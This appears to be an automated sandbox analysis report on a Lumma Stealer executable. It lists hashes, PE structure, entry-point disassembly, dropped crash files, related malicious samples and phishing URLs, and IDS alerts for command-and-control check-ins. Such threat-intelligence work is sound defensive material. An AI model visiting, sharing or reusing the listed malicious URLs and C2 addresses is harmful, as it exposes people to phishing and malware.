	https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	199.232.210.172
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	down.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	104.102.49.254
	c3KH2gLNrM.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	104.102.49.254
s-part-0044.t-0009.fb-t-msedge.net	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.253.72
	original.eml	Get hash	malicious	Tycoon2FA	Browse	13.107.253.72
	http://www.twbcompany.com	Get hash	malicious	Unknown	Browse	13.107.253.72
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	13.107.253.72
	https://pub-53d8c8824459455a8bb62d4b9a0d5f2f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	http://ikergalindez.github.io/gofish/	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	Statement of Account COFCO Pte Ltd.exe	Get hash	malicious	FormBook	Browse	13.107.253.72
	https://replybb.wixstudio.io/my-site	Get hash	malicious	Unknown	Browse	13.107.253.72

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exe	Get hash	malicious	Unknown	Browse	172.67.145.190
	Ref#0503711.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdM	Get hash	malicious	HtmlDropper	Browse	172.67.212.190
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	DocuSign-Docx.pdf	Get hash	malicious	Unknown	Browse	88.221.168.23
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	down.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://issuu.com/smart_media/docs/die_welt_wirtschaft/19	Get hash	malicious	Unknown	Browse	23.212.88.20
	Hscni Remittance_8115919700_16831215.html	Get hash	malicious	Tycoon2FA	Browse	173.223.116.167

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	13.107.253.72
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	13.107.253.72
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.253.72
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	13.107.253.72
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.253.72
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.253.72
	https://fenster-mark-gmbhsharefile.btn-ebikes.com/	Get hash	malicious	Unknown	Browse	13.107.253.72
	Hscni Remittance_8115919700_16831215.html	Get hash	malicious	Tycoon2FA	Browse	13.107.253.72
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	13.107.253.72
	High Court Summons Notice.pdf	Get hash	malicious	Unknown	Browse	13.107.253.72
28a2c9bd18a11de089ef85a160da29e4	45Ywq5ad5H.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	13.107.253.72
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.253.72
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	13.107.253.72
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	13.107.253.72
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.253.72
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.253.72
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	13.107.253.72
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	13.107.253.72
	https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdM	Get hash	malicious	HtmlDropper	Browse	13.107.253.72
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
a0e9f5d64349fb13191bc781f81f42e1	45Ywq5ad5H.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8 104.102.49.254
	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8 104.102.49.254
	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.53.8 104.102.49.254
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.53.8 104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 104.102.49.254
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	104.21.53.8 104.102.49.254

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TuQlz67byH.exe_d76742b7c7eb12edef8869ab2eace6d431024f4_b43b274e_a43d26ab-ffb2-4ba1-9e25-7cc724e4c613\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6557373598358295
Encrypted:	false
SSDEEP:	96:iU2XWFEOO0H6s5yk7AxfuQXIDcQvc6QcEVcw3cE/3+HbHg/5hZAX/d5FMT2SlPko:ilWJOe6n0BU/QjhzuiF0Z24IO8i
MD5:	4644FD107F864E9BF3DF112BE47695C8
SHA1:	9E2D52997F1589822803C8FAE79F76F39335E301
SHA-256:	C43B48092053631C464D15665F64CCB3FDC88E4952B20925A3885F745BA7BF02
SHA-512:	2C0B303E12BE0811E2A4FBB72C0430962799EDA2DAFBF18C42A9C5EF476A231FD41257500A4BE99A9D3F0FA3C44F814D01539BEE5FFABE7B7D4E8496D8A61E8F
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.3.2.4.1.8.4.7.6.9.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.3.2.4.2.1.7.5.8.2.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.3.d.2.6.a.b.-.f.f.b.2.-.4.b.a.1.-.9.e.2.5.-.7.c.c.7.2.4.e.4.c.6.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.c.9.d.5.2.e.-.2.9.a.2.-.4.e.9.3.-.8.c.3.6.-.a.0.1.0.a.5.a.6.f.a.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.u.Q.l.z.6.7.b.y.H...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.d.c.-.0.0.0.1.-.0.0.1.5.-.4.f.5.3.-.1.8.9.4.d.8.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.1.5.7.b.6.1.a.2.4.0.8.7.5.2.1.6.9.3.c.8.a.c.a.7.4.3.d.6.0.e.4.c.3.3.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22C2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 7 16:47:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35450
Entropy (8bit):	1.6601789990165903
Encrypted:	false
SSDEEP:	96:5v8wnfQDac3uEO8Ni77Tb3YveEKVw2gSr5n+oSAWrKVkjS68LWx4Wqx9avYfCo4+:GezT8NOsGrw2CJAlr5jsiJjqTAPt
MD5:	96C3A98AA4B609EC0E8586FF3669D8CD
SHA1:	DE16273A74B115188306A9A5C7D68F1C4E6C42F7
SHA-256:	7627A85308613D62CB1BDEE51D41FAD3EEAC35835F283864DB92B77BAEC459E6
SHA-512:	AED2316B6D4102F02B3CC09C55624E2EB1D067D28057E5D9750C2BBD49EE30526299B5715C743314860DEFB547450CB0303548FF0845193AE3752A48DCBE2108
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g........................d...........................T.......8...........T...............z.......................................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2331.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.69829383026051
Encrypted:	false
SSDEEP:	192:R6l7wVeJnW626Y2DzSU99ZSgmf79T+prt89bkxsf02sm:R6lXJW626YeSU92gmf79TBkqft
MD5:	34BDE4E9116C22AE02597CAC5F7AA0EF
SHA1:	4454A06601691C2BB78668AC5646F847857E21B5
SHA-256:	2835230FD967D6804A763BC98A99B293E9F9249E6FEFF784D929EA4EF564087C
SHA-512:	3A5459DCD02B4476F1B8BE314B733740E00BF60F4E3BC235274BB345B0FEA9E5146E34877F5C580693ADB7B8F244DA7ADED897F8ADA735CF76F4523125D612A5
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2380.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4678
Entropy (8bit):	4.4919774993319015
Encrypted:	false
SSDEEP:	48:cvIwWl8zswJg77aI9DcVWpW8VY/Ym8M4JrV8gDF++q8UZjBa0RRttQtfd:uIjf2I7hZ7VfJ6ja0xYfd
MD5:	DD16946F8C52E0A5B87CBC6B68322368
SHA1:	1AAEE2CAD80C9E4E03809031F64A28FE509DBE4E
SHA-256:	4EB3D84AD468FC1208B0DB7962DA002EEFBE7F3507E2D2B5A535E91D42CD7ED1
SHA-512:	0BF4EF63D93972F3EC16DAEA31E7D04E36BA963008DD75947806AD95906A027FF7197763CD244FC510DB08AAEA93E0CA9FE68289341B2CB93C03D0A5E38CB1E4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533270" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4692328652456546
Encrypted:	false
SSDEEP:	6144:NzZfpi6ceLPx9skLmb0fsZWSP3aJG8nAgeiJRMMhA2zX4WABluuNYjDH5S:FZHtsZWOKnMM6bFpCj4
MD5:	8B697CF42EC0F3CF55C55154C00361E3
SHA1:	5CB5ACB005F343692EF43223AEDC859BCBBD9807
SHA-256:	1E51685C571839B4F8B32F772552DEC28B6811187DB1D71615FEAC15B5BBEC69
SHA-512:	667CF23055EA2A3C4AA4D3D6AB977A1398E50CA29893C75B672E6CE67A1778226B0DC6687AF9B03BB9CD920412E1A4608377AF5EAC57E33D0E702D3902A3F54C
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..S..................................................................................................................................................................................................................................................................................................................................................bE.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.723529670914476
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TuQlz67byH.exe
File size:	551'424 bytes
MD5:	8e704acd1b0c26fdcfd0374d57fcb28e
SHA1:	157b61a24087521693c8aca743d60e4c33cb803d
SHA256:	6c7818a65f46711fbc89cd7b548829e98be247fab8b2c4766c85b64bc632e797
SHA512:	b9248880d2b68a7a171f210ce0d9db345c189c411c4946238ed840d0ed993563b413d66a1ed61357bfe699ebc62f9817c4390cffd30067f7a357a5db3bd63351
SSDEEP:	12288:ofmHj9OPDULypmp0/dPAOQxjiVQZ9n4CZpywJl9VOLO4S:oq9O9gCZTaiiZ9tXVOL
TLSH:	DCC4F112B9C08072D572253207F5E6B95E7EBCB00A619ECF5B981B7E4F30291D721A6F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406f52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67040A8D [Mon Oct 7 16:21:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d10af643340e1121562abe3e6bd5b0e1

Entrypoint Preview

Instruction
call 00007F6B70E91C80h
jmp 00007F6B70E911EFh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F6B70E9138Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F6B70E9137Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F6B70E9137Eh
add edx, 28h
cmp edx, esi
jne 00007F6B70E9135Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F6B70E9136Bh
push esi
call 00007F6B70E91F94h
test eax, eax
je 00007F6B70E91392h
mov eax, dword ptr fs:[00000018h]
mov esi, 00486754h
mov edx, dword ptr [eax+04h]
jmp 00007F6B70E91376h
cmp edx, eax
je 00007F6B70E91382h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F6B70E91362h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F6B70E91379h
mov byte ptr [00486758h], 00000001h
call 00007F6B70E9162Ah
call 00007F6B70E94547h
test al, al
jne 00007F6B70E91376h
xor al, al
pop ebp
ret
call 00007F6B70E9CFA9h
test al, al
jne 00007F6B70E9137Ch
push 00000000h
call 00007F6B70E9454Eh
pop ecx
jmp 00007F6B70E9135Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00486759h], 00000000h
je 00007F6B70E91376h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c6c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x89000	0x1ad4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2abc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ab00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210f0	0x21200	5ebaeec256d4f08bde4064730ec0aa89	False	0.5865271226415094	data	6.666612249562001	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x9d78	0x9e00	1a02eba08a99f151ea92c07046f174ab	False	0.4350771360759494	data	4.954805195839558	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2d000	0x5a380	0x59600	be27e6950d7082553625093b67e78b17	False	0.9912368881118881	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	7.99239246926617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x88000	0x3d8	0x400	c67ba8481d4e7c92e5fe9f152983a3f3	False	0.439453125	data	3.287044161603086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x89000	0x1ad4	0x1c00	24fe8fc60046b9dc80175d613229bc20	False	0.7268415178571429	data	6.390208722822675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x88058	0x380	data	English	United States	0.46205357142857145

Imports

DLL

Import

KERNEL32.dll

AttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T18:47:25.590055+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49710	104.21.53.8	443	TCP
2024-10-07T18:47:25.590055+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49710	104.21.53.8	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 18:47:19.452378988 CEST	49673	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:19.452461004 CEST	49674	443	192.168.2.6	173.222.162.64
Oct 7, 2024 18:47:19.780432940 CEST	49672	443	192.168.2.6	173.222.162.64
